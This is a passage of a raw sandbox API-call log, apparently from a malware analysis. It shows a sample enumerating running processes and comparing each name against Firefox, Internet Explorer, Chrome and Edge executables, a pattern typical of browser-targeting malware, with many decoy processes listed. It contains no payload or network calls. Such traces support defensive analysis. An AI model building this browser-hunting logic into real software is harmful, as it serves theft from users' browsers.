lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.639] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0253.639] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0253.639] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0253.639] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.639] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.640] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0253.640] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0253.640] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0253.640] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.640] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.640] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0253.640] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0253.640] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0253.640] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.640] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0253.641] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0253.641] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0253.641] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0253.641] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.641] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.641] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.641] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.641] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.642] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.642] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.642] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.642] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.642] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.642] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.642] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.643] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.643] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.643] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.643] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.643] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.643] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.643] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.643] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.643] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.643] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.644] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.644] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.644] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.644] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.644] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.644] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0253.644] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0253.644] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0253.644] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.644] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.645] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.645] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.645] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.645] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.645] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.645] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.645] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.645] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.645] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.645] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.646] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0253.646] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0253.646] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0253.646] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.646] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.646] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0253.646] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0253.647] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0253.647] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.647] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.647] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0253.647] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0253.647] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0253.647] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.647] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.648] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.648] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.648] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.648] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.648] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0253.648] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0253.648] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0253.648] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0253.648] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.648] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0253.649] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0253.649] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0253.649] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0253.649] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.649] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0253.649] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0253.649] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0253.649] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0253.649] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.649] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0253.650] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0253.650] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0253.650] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0253.650] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.650] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0253.650] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0253.651] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0253.651] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0253.651] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.651] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0253.651] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0253.651] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0253.651] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0253.651] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.651] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0253.652] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0253.652] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0253.652] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0253.652] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.652] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0253.652] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0253.652] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0253.652] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0253.652] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.652] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0253.653] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0253.653] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0253.653] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0253.653] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.653] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0253.653] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0253.653] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0253.653] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0253.653] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.653] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0253.654] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0253.654] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0253.654] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0253.654] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.654] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0253.654] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0253.654] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0253.654] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0253.654] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.655] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0253.655] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0253.655] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0253.655] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0253.655] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.655] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0253.656] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0253.656] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0253.656] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0253.656] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.656] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0253.656] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0253.656] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0253.656] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0253.656] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.656] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0253.657] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0253.657] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0253.657] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0253.657] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.657] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0253.657] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0253.657] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0253.657] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0253.657] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.657] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0253.658] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0253.658] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0253.658] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0253.658] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.658] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0253.658] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0253.658] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0253.658] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0253.658] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.658] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0253.659] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0253.659] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0253.659] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0253.659] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.659] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0253.659] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0253.659] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0253.659] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0253.660] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.660] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0253.660] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0253.660] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0253.660] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0253.660] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.660] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.661] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0253.661] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0253.661] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0253.661] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.661] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.661] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.661] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.661] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.661] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.661] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0253.662] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 